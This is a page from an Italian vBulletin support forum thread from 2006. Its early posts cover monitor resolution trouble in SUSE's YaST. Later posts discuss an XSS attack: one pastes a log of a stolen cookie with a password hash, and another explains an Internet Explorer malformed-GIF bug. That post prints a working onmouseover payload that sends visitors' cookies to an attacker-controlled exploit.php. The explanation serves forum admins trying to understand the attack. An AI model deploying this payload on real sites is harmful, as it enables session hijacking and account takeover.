Risultati da 21 a 30 di 42
-
29-06-2006, 02:15 #21
Se il monitor lo consente lo puoi configurare si se proprio non hai una scheda video stranissima, ma dovrebbero essere tutte compatibili, non in modalità accellerata, ma modalità normale si, guarda nello Yast, non ricordo esattamente ora, ma c'è un modulo per configurare il monitor proprio come in win.
Io avevo configurato i monitors dual head quando usavo solo Suse.
-
29-06-2006, 02:25 #22
Ocio non sbattere gli occhi, 13 herz, davanti al monitor che vi prendono anche la retina e che con quella poi vi clonano il buco del cul*.
Conviene sempre guardare il monitor nel lato superiore destro, tipo strabico, in questo modo vi vedono al massimo un quarto del DNA che non è nulla visto che il 99,99% siamo simili alle scimmie.
jancarlo
-
29-06-2006, 02:25 #23
- Data Registrazione
- Dec 2005
- Età
- 39
- Messaggi
- 1,065
Ho la ATI X800GTO quindi nn è proprio stranissima
Cioè nello Yast nonostante cambi risoluzione resta sempre a 640... Domani controllo con + calma...
Poi mi pare strano che i caratteri si vedano in piccolissimo, quasi alcuni non si leggono da quanto son piccoliConsigli?
-
29-06-2006, 20:48 #24
-
29-06-2006, 20:50 #25
Rimandiamo ad un post nuovo qua siamo del tutto OT : http://www.vbulletin.it/showthread.php?p=3306#post3306
-
29-06-2006, 22:12 #26
- Data Registrazione
- Dec 2005
- Età
- 39
- Messaggi
- 1,065
-
30-06-2006, 17:55 #27
Ecco cosa arriva tramite mail, per farvi capire la gravità della cosa:
Xss: Hacking Ip: 87.11.***.134 Cookie: bblastvisit=1133099136; bblastactivity=1133107002; bbuserid=1****; bbpassword=250aca696300c0a3927492cd674ab4b6; vbulletin_collapse; bbstyleid=1 Url: http://www.sito.it/dir/exploit.php porta usata: 80 remote port: 2325 Giorno & Ora : Wednesday, June 28, 2006, 4:25 pm
-
30-06-2006, 18:59 #28
- Data Registrazione
- Nov 2004
- Località
- Gavirate (Varese)
- Età
- 42
- Messaggi
- 25
-
30-06-2006, 19:48 #29
Esatto.
Quello che non ho capito se il cookies viene rilevato attraverso l'immagine allegata tramite il vBulletin, quelle inserite nel MySql per intenderci, non so se è da considerarsi un "click diretto"
-
30-06-2006, 19:59 #30
- Data Registrazione
- Nov 2004
- Località
- Gavirate (Varese)
- Età
- 42
- Messaggi
- 25
allora...
non viene preso nulla dal server che ospita vbulletin... il bug è riferito a internet explorer, che anzichè vedere un fil .gif malformato, esegue il codice contenuto, di fatto residente sul server ospitante vbulletin, in quanto è un attach.
cosa c'è scritto li dentro? semplicemente richiama un file esterno che non fa altro che salvarsi il cookie del pc dell'utente che con il mouse passa sopra all'immagine, lo si vede da qui:
Codice:<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >
dove exploit.php è la pagina sul server di chi ci ha allegato l'immagine, c è la variabile passata a quella pagine e +document.cookie altro non è che il nostro bel cookie concatenato come stringa tramite il javascript, il risultato è far spedite il nostro cookie al server remoto.
ricostruendo il cookie posso accedere con i dati dell'utente.
Stando a vedere questo passaggio, non è un bug XSS specifico di vbulletin, ma potenzialmente qualsiasi sito che permetta l'upload di file ne è soggetto, quindi tutti i vbulletin, ma anche tutte le altre piattaforme forum, cms, fotogallery ecc...
Discussioni Simili
-
Traduzione completa vBulletin 3.5.4 /3.5.3
Di Danny nel forum Annunci & NewsRisposte: 9Ultimo Messaggio: 07-05-2006, 20:29 -
vBulletin 3.5.4
Di mossss nel forum Annunci & NewsRisposte: 2Ultimo Messaggio: 27-03-2006, 20:28 -
vBulletin 3.0.13
Di mossss nel forum Annunci & NewsRisposte: 2Ultimo Messaggio: 27-03-2006, 20:12 -
Rilasciata vBulletin 3.5.0 'GOLD'
Di mossss nel forum Annunci & NewsRisposte: 1Ultimo Messaggio: 23-10-2005, 16:10 -
vBulletin 3.0.x da phpBB a Vbulletin
Di ecko nel forum VBulletin 3Risposte: 19Ultimo Messaggio: 10-03-2005, 12:29
Segnalibri